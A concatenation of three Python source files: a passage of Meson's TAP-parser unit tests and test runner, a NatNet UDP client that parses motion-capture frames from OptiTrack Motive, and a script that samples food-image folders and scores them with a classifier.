self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
raise SystemExit(main())
|
NatNetClient.py
|
import sys
import time
import socket
import struct
import timecode
from threading import Thread
def trace(*args):
pass#' '.join([str(arg) for arg in args])
# Create structs for reading various object types to speed up parsing.
ShortValue = struct.Struct('<h')
IntegerValue = struct.Struct('<i')
UnsignedIntegerValue = struct.Struct('<I')
UnsignedLongValue = struct.Struct('<Q')
FloatValue = struct.Struct('<f')
DoubleValue = struct.Struct('<d')
Vector3 = struct.Struct('<fff')
Quaternion = struct.Struct('<ffff')
class NatNetClient:
def __init__(self, serverIP):
# Change this value to the IP address of the NatNet server.
self.serverIPAddress = serverIP
# This should match the multicast address listed in Motive's streaming settings.
self.multicastAddress = "239.255.42.99"
# NatNet Command channel
self.commandPort = 1510
# NatNet Data channel
self.dataPort = 1511
# Set this to a callback method of your choice to receive per-rigid-body data at each frame.
self.rigidBodyListener = None
self.newFrameListener = None
# NatNet stream version. This will be updated to the actual version the server is using during initialization.
self.__natNetStreamVersion = (3,0,0,0)
# Conversion from ID to name
self.__names = {}
# Client/server message ids
NAT_PING = 0
NAT_PINGRESPONSE = 1
NAT_REQUEST = 2
NAT_RESPONSE = 3
NAT_REQUEST_MODELDEF = 4
NAT_MODELDEF = 5
NAT_REQUEST_FRAMEOFDATA = 6
NAT_FRAMEOFDATA = 7
NAT_MESSAGESTRING = 8
NAT_DISCONNECT = 9
NAT_UNRECOGNIZED_REQUEST = 100
# Assets ids
NAT_MARKERSET = 0
NAT_RIGIDBODY = 1
NAT_SKELETON = 2
##################################################################################################
# UDP SOCKETS
##################################################################################################
# Create a data socket to attach to the NatNet stream (get data from Motive)
def __createDataSocket(self, port):
result = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.bind(('', port))
mreq = struct.pack("4sl", socket.inet_aton(self.multicastAddress), socket.INADDR_ANY)
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
return result
# Create a command socket to attach to the NatNet stream (ask for data to Motive)
def __createCommandSocket(self):
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.bind(('', 0))
result.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
return result
#####################################################################################################
# ASSETS (RIGID BODIES, SKELETONS)
#####################################################################################################
# Unpack a rigid body object from a data packet
def __unpackRigidBody(self, data):
offset = 0
# ID (4 bytes)
id_, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("ID:", id_)
# Position and orientation
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
trace("\tPosition: {:.3f} {:.3f} {:.3f}".format(pos[0], pos[1], pos[2]))
rot = Quaternion.unpack(data[offset:offset+16])
offset += 16
trace("\tOrientation: {:.3f} {:.3f} {:.3f} {:.3f}".format(rot[0], rot[1], rot[2], rot[3]))
# Mean markers error
if (self.__natNetStreamVersion[0] >= 2):
markerError, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("\tMarker Error:", markerError)
# Version 2.6 and later
if (((self.__natNetStreamVersion[0] == 2) and (self.__natNetStreamVersion[1] >= 6)) or self.__natNetStreamVersion[0] > 2 or self.__natNetStreamVersion[0] == 0):
param, = ShortValue.unpack(data[offset:offset+2])
trackingValid = (param & 0x01) != 0
offset += 2
trace("\tTracking Valid:", trackingValid)
# Send information to any listener.
if self.rigidBodyListener is not None:
name = self.__names[id_] if id_ in self.__names.keys() else "Unknown"
self.rigidBodyListener(id_, name, trackingValid, pos, rot)
return offset
# Unpack a skeleton object from a data packet
def __unpackSkeleton(self, data):
offset = 0
# ID
id_, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("ID:", id_)
# Bones number
rigidBodyCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Rigid Body Count:", rigidBodyCount)
# Extract each bone as a rigid body
for j in range(0, rigidBodyCount):
offset += self.__unpackRigidBody(data[offset:])
return offset
#############################################################################################################
# MOCAP DATA (MARKERS, VERSION, TIME STAMP, ...)
#############################################################################################################
# Unpack data from a motion capture frame message
def __unpackMocapData(self, data):
trace("Begin MoCap Frame\n-----------------")
offset = 0
# Frame number (4 bytes)
frameNumber, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Frame #:", frameNumber)
# Marker set count (4 bytes)
markerSetCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Marker Set Count:", markerSetCount)
# Loop over marker sets
for i in range(0, markerSetCount):
# Model name
modelName, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(modelName) + 1
trace("Model Name:", modelName.decode('utf-8'))
# Marker count (4 bytes)
markerCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Marker Count:", markerCount)
for j in range(0, markerCount):
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
trace("\tMarker {}: {:.3f}, {:.3f}, {:.3f}".format(j, pos[0], pos[1], pos[2]))
##################################
# UNLABELED MARKERS (DEPRECATED) #
##################################
# Unlabeled markers count (4 bytes)
unlabeledMarkersCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
#trace("Unlabeled Markers Count:", unlabeledMarkersCount)
for i in range(0, unlabeledMarkersCount):
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
#trace("\tMarker {}: {:.3f}, {:.3f}, {:.3f}".format(j, pos[0], pos[1], pos[2]))
################
# RIGID BODIES #
################
# Rigid body count (4 bytes)
rigidBodyCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Rigid Body Count:", rigidBodyCount)
for i in range(0, rigidBodyCount):
offset += self.__unpackRigidBody(data[offset:])
#############
# SKELETONS #
#############
skeletonCount = 0
# Version 2.1 and later
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] > 0) or self.__natNetStreamVersion[0] > 2):
skeletonCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Skeleton Count:", skeletonCount)
for i in range(0, skeletonCount):
offset += self.__unpackSkeleton(data[offset:])
####################
# LABELLED MARKERS #
####################
labeledMarkerCount = 0
# Version 2.3 and later
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] > 3) or self.__natNetStreamVersion[0] > 2):
labeledMarkerCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Labeled Marker Count:", labeledMarkerCount)
for i in range(0, labeledMarkerCount):
markerID, = ShortValue.unpack(data[offset:offset+2])
modelID, = ShortValue.unpack(data[offset+2:offset+4])
offset += 4
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
size, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("\tID: [MarkerID {}] [ModelID {}]".format(markerID, modelID))
trace("\tPosition: {:.3f} {:.3f} {:.3f}".format(pos[0], pos[1], pos[2]))
trace("\tSize: {:.3f})".format(size))
# Version 2.6 and later
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 6) or self.__natNetStreamVersion[0] > 2):
params, = ShortValue.unpack(data[offset:offset+2])
offset += 2
occluded = (params & 0x01) != 0
pointCloudSolved = (params & 0x02) != 0
modelSolved = (params & 0x04) != 0
trace("\tSolved:", occluded, pointCloudSolved, modelSolved)
# Version 3.0 and later
if (self.__natNetStreamVersion[0] >= 3):
hasModel = (params & 0x08) != 0
unlabeled = (params & 0x10) != 0
active = (params & 0x20) != 0
trace("\tModel:", hasModel, unlabeled, active)
# Version 3.0 and later
if (self.__natNetStreamVersion[0] >= 3):
residual, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("\tResidual:", residual)
####################
# FORCE PLATE DATA #
####################
# Force Plate data (version 2.9 and later)
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 9) or self.__natNetStreamVersion[0] > 2):
forcePlateCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Force Plate Count:", forcePlateCount)
for i in range(0, forcePlateCount):
# ID
forcePlateID, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Force Plate {}: {}".format(i, forcePlateID))
# Channel Count
forcePlateChannelCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Channel Data
for j in range(0, forcePlateChannelCount):
trace("\tChannel {}: {}".format(j, forcePlateID))
forcePlateChannelFrameCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
for k in range(0, forcePlateChannelFrameCount):
forcePlateChannelVal, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("\t\t", forcePlateChannelVal)
###############
# DEVICE DATA #
###############
# Device data (version 2.11 and later)
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 11) or self.__natNetStreamVersion[0] > 2):
deviceCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Device Count:", deviceCount)
for i in range(0, deviceCount):
# ID
deviceID, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Device {}: {}".format(i, deviceID))
# Channel Count
deviceChannelCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Channel Data
for j in range(0, deviceChannelCount):
trace("\tChannel {}: {}", j, deviceID)
deviceChannelFrameCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
for k in range(0, deviceChannelFrameCount):
deviceChannelVal, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("\t\t", deviceChannelVal)
##############
# PARAMETERS #
##############
if (self.__natNetStreamVersion[0] < 3):
softwareLatency, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("Software latency:", softwareLatency)
# Timecode
tc, = UnsignedIntegerValue.unpack(data[offset:offset+4])
offset += 4
sub, = UnsignedIntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Timecode:", tc, sub)
# Timestamp (increased to double precision in 2.7 and later)
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 7) or self.__natNetStreamVersion[0] > 2):
timestamp, = DoubleValue.unpack(data[offset:offset+8])
offset += 8
else:
timestamp, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("Timestamp:", timestamp)
# High res Timestamp (Version 3.0 and later)
if ((self.__natNetStreamVersion[0] >= 3)):
stampCameraExposure, = UnsignedLongValue.unpack(data[offset:offset+8])
offset += 8
stampDataReceived, = UnsignedLongValue.unpack(data[offset:offset+8])
offset += 8
stampTransmit, = UnsignedLongValue.unpack(data[offset:offset+8])
offset += 8
trace("Mid-exposure timestamp:", stampCameraExposure)
trace("Camera data received timestamp :", stampDataReceived)
trace("Transmit timestamp :", stampTransmit)
# Frame parameters
param, = ShortValue.unpack(data[offset:offset+2])
isRecording = (param & 0x01) != 0
trackedModelsChanged = (param & 0x02) != 0
offset += 2
trace("Frame parameters:", isRecording, trackedModelsChanged)
# End of data tag
eod, = IntegerValue.unpack(data[offset:offset+4])
trace("-----------------\nEnd MoCap Frame")
# Send information to any listener.
if self.newFrameListener is not None:
self.newFrameListener(frameNumber, markerSetCount, unlabeledMarkersCount, rigidBodyCount, skeletonCount,
labeledMarkerCount, timecode, timecodeSub, timestamp, isRecording, trackedModelsChanged)
##############################################################################################################################
# ASSETS DESCRIPTIONS
##############################################################################################################################
# Unpack a marker set description packet
def __unpackMarkerSetDescription(self, data):
offset = 0
# Market set info
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tName:", name.decode('utf-8'))
# Number of markers
markerCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Unpack each marker
for i in range(0, markerCount):
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tMarker Name:", name.decode('utf-8'))
return offset
# Unpack a rigid body description packet
def __unpackRigidBodyDescription(self, data):
offset = 0
# Body label (Version 2.0 or higher)
if self.__natNetStreamVersion[0] >= 2:
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tName:", name.decode('utf-8'))
id_, = IntegerValue.unpack(data[offset:offset+4])
trace("\tID:", id_)
offset += 4
# Update correspondance
self.__names[id_] = name
# Parent ID
parentID, = IntegerValue.unpack(data[offset:offset+4])
trace("\tParent ID:", parentID)
offset += 4
# Time stamp
timestamp = Vector3.unpack(data[offset:offset+12])
trace("\tTime stamp:", timestamp)
offset += 12
# Per-marker data (Version 3.0 or higher)
if self.__natNetStreamVersion[0] >= 3:
# Number of markers
nMarkers, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Markers position (3 floats / marker)
positions = []
for i in range(nMarkers):
position = Vector3.unpack(data[offset:offset+12])
positions.append(position)
offset += 12
# Marker required label (1 int / label)
required_labels = []
for i in range(nMarkers):
required_label, = IntegerValue.unpack(data[offset:offset+4])
required_labels.append(required_label)
offset += 4
# Display
trace('\tMarkers:')
for i in range(nMarkers):
x, y, z = positions[i]
label = required_labels[i]
trace('\t\t{:.2f}, {:.2f}, {:.2f} ({})'.format(x, y, z, label))
return offset
# Unpack a skeleton description packet
def __unpackSkeletonDescription(self, data):
offset = 0
# Info
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tName:", name.decode('utf-8'))
# ID
id_, = IntegerValue.unpack(data[offset:offset+4])
trace("\tID:", id_)
offset += 4
# Number of bones
rigidBodyCount, = IntegerValue.unpack(data[offset:offset+4])
trace("\tNumber of bones:", rigidBodyCount)
offset += 4
# Unpack bones as rigid bodies
for i in range(0, rigidBodyCount):
offset += self.__unpackRigidBodyDescription(data[offset:])
return offset
# Unpack a data description packet
def __unpackDataDescriptions(self, data):
offset = 0
# Number of assets
datasetCount, = IntegerValue.unpack(data[offset:offset+4])
trace('dataset count:', datasetCount)
offset += 4
# Reset correspondance
self.__names = {}
# Extract assets
for i in range(0, datasetCount):
# Asset type ((marker=0, rigid bodies=1, skeletons=2)
asset, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Unpack asset
if asset == self.NAT_MARKERSET:
trace('Asset ', str(i)+': Marker Set')
offset += self.__unpackMarkerSetDescription(data[offset:])
elif asset == self.NAT_RIGIDBODY:
trace('Asset ', str(i)+': Rigid Body')
offset += self.__unpackRigidBodyDescription(data[offset:])
elif asset == self.NAT_SKELETON:
trace('Asset ', str(i)+': Skeleton')
offset += self.__unpackSkeletonDescription(data[offset:])
##################################################################################################
# MAIN LOOP
##################################################################################################
def __dataThreadFunction(self, socket):
while True:
data, addr = socket.recvfrom(32768)
if (len(data) > 0):
self.__processMessage(data)
def __processMessage(self, data):
trace("Begin Packet\n------------")
#
# MESSAGE STRUCTURE: ID (2 bytes) SIZE (2 bytes) DATA (size bytes)
#
# See __init__ for messages IDs, DATA is the message content
#
# Message type
messageID, = ShortValue.unpack(data[0:2])
trace("Message ID: ", messageID)
# Message size
packetSize, = ShortValue.unpack(data[2:4])
trace("Packet Size: ", packetSize)
offset = 4
# Unpack message
if (messageID == self.NAT_FRAMEOFDATA):
self.__unpackMocapData(data[offset:])
elif (messageID == self.NAT_MODELDEF):
self.__unpackDataDescriptions(data[offset:])
elif (messageID == self.NAT_PINGRESPONSE):
offset += 256 # Skip the sending app's Name field
offset += 4 # Skip the sending app's Version info
self.__natNetStreamVersion = struct.unpack('BBBB', data[offset:offset+4])
trace('NatNet version: ', self.__natNetStreamVersion)
offset += 4
elif (messageID == self.NAT_RESPONSE):
if (packetSize == 4):
commandResponse, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Command response:", commandResponse)
else:
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Command response:", message.decode('utf-8'))
elif (messageID == self.NAT_UNRECOGNIZED_REQUEST):
trace("Received 'Unrecognized request' from server")
elif (messageID == self.NAT_MESSAGESTRING):
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Received message from server:", message.decode('utf-8'))
else:
trace("ERROR: Unrecognized packet type")
trace("----------\nEnd Packet\n")
##############################################################################################
# SERVER REQUESTS
##############################################################################################
# Send command to server
def sendCommand(self, command, commandStr, socket, address):
# Auto-fill commandStr for known commands
if (command == self.NAT_REQUEST_MODELDEF or command == self.NAT_REQUEST_FRAMEOFDATA):
packetSize = 0
commandStr = ""
elif (command == self.NAT_REQUEST):
packetSize = len(commandStr) + 1
elif (command == self.NAT_PING):
commandStr = "Ping"
packetSize = len(commandStr) + 1
# Pack command and packet size as header
data = IntegerValue.pack(command)
data += IntegerValue.pack(packetSize)
# Choose UTF-8 encoding and add carriage return
data += commandStr.encode('utf-8')
data += b'\0'
# Send command over command port
socket.sendto(data, address)
# Return NatNetVersion
def getVersion():
return self.__natNetStreamVersion
##################################################################################################
# INIT
##################################################################################################
def run(self):
# Create the data socket
self.dataSocket = self.__createDataSocket(self.dataPort)
if (self.dataSocket is None):
print("Could not open data channel")
exit
# Create the command socket
self.commandSocket = self.__createCommandSocket()
if (self.commandSocket is None):
print("Could not open command channel")
exit
# Create a separate thread for receiving data packets
dataThread = Thread(target = self.__dataThreadFunction, args = (self.dataSocket,))
#dataThread.setDaemon(True)
dataThread.start()
# Create a separate thread for receiving command packets
commandThread = Thread(target = self.__dataThreadFunction, args = (self.commandSocket,))
#commandThread.setDaemon(True)
commandThread.start()
# Ping server to get NatNet version
self.sendCommand(self.NAT_PING, "", self.commandSocket, (self.serverIPAddress, self.commandPort))
# Request model definition (correspondance label <-> id)
self.sendCommand(self.NAT_REQUEST_MODELDEF, "", self.commandSocket, (self.serverIPAddress, self.commandPort))
################################################################################################
# TEST
################################################################################################
if __name__ == "__main__":
# This will create a new NatNet client
streamingClient = NatNetClient("127.0.0.1")
# Start up the streaming client
streamingClient.run()
# Infinite loop
while True:
time.sleep(1)
|
auto_detect.py
|
##
## python auto_detect.py --srcdir srcfilePath --out result --num 10 --threshold 0.80
## --srcdir pictures for testing
## --out assign result dir
## --num numbers to simple for every dir
## --threshold
##
##
## 3 classes, class0 from none dish, class1 current dish, class2 from others dishes
##
import argparse
import os
from trainer import Trainer
from utils import Utils
from const import const
from food_net import FoodNet
import time
import multiprocessing
from pdb import set_trace
from numpy import *
#import psutil
#import objgraph
fileList = []
def test_sub_process(output_path, test_num, threshold, test_list, result_list):
print ("test process start...")
output = open(output_path, "w")
foodnet = FoodNet(const.GRAPH, const.LABELS);
for testdir in test_list: # test other dir
output.write("%s,\n" % (os.path.basename(testdir)))
test_files = []
listfile = os.listdir(testdir)
for i in range(test_num):
randint = random.randint(1, len(listfile))
# print ('[%d] %s'%(i,listfile[num] ))
test_files.append(os.path.join(testdir, listfile[randint]))
result = foodnet.label_files(test_files)
result.sort(key=lambda x: x[1], reverse=True)
sum = 0;
for k in result:
output.write(",%s,,%f\n" % (os.path.basename(k[0]), k[1]))
if k[1] > threshold:
sum = sum + 1
output.write("%d,\n" % (sum))
print('%s : %d' % (os.path.basename(testdir), sum))
#print(psutil.Process(os.getpid()).memory_info())
#objgraph.show_growth(limit=4)
#objgraph.show_refs(foodnet, filename='sample-backref-graph.png')
result_list.append((os.path.basename(testdir), sum))
foodnet.close()
print ("test process finish...")
output.close()
pass
def test_others(cur_dir, dir_list):
output_path = os.path.join(outdir, cur_dir + ".csv")
result_array = []
with multiprocessing.Manager() as manager:
test_list = manager.list()
test_list.extend(dir_list)
result_list = manager.list()
p_label = multiprocessing.Process(target=test_sub_process, args=(output_path, int(num), float(threshold), test_list,result_list))
p_label.start()
p_label.join()
result_array.extend(result_list)
result_array.sort(key=lambda x: x[1], reverse=True)
for k in result_array:
resultfile.write(",%s,,%d\n" % (k[0], k[1]))
resultfile.flush()
if __name__ == '__main__':
srcdir = "./"
outdir = "result"
num = 10
threshold = "0.90"
dict = []
const.ROOTDIR = os.getcwd();
parser = argparse.ArgumentParser()
parser.add_argument("--srcdir", help="src dir")
parser.add_argument("--outdir", help="output dir")
parser.add_argument("--num", help="number to simpling")
parser.add_argument("--threshold", help="just threshold")
FLAGS, unparsed = parser.parse_known_args()
print(FLAGS)
print(type(FLAGS))
args = parser.parse_args()
if args.srcdir:
srcdir = args.srcdir
if args.outdir:
outdir = args.outdir
if args.num:
num = args.num
if args.threshold:
threshold = float(args.threshold)
#Utils.removeSubFilesInDir(outdir) # clean out files last time
if not os.path.exists(outdir):
os.makedirs(outdir)
#Trainer.clean() # clean training files last time
#Utils.removeSubFilesInDir(const.TRAIN_OTHER) # clean out files last time
#Utils.removeSubFilesInDir(const.TRAIN_NEG)
fileList = os.listdir(srcdir)
print(fileList)
dirnum = len(fileList)
if dirnum == 0:
exit(0)
start = time.time()
#Utils.copyDir(const.NEG_PICTURES, const.TRAIN_NEG)
result_path = os.path.join(outdir, const.RESULTFILE)
resultfile = open(result_path, "w")
for i in range(dirnum - 1): # training every dir
traindir = os.path.join(srcdir, fileList[i])
if not os.path.isdir(traindir):
print(fileList[i] + ' is not a dir')
continue
for j in range(1, dirnum):
if j == i:
continue
otherdir = os.path.join(srcdir, fileList[j])
if not os.path.isdir(otherdir):
continue
Utils.randomCopyFile(otherdir, const.TRAIN_OTHER, int(num))
resultfile.write("%s\n" % (fileList[i]))
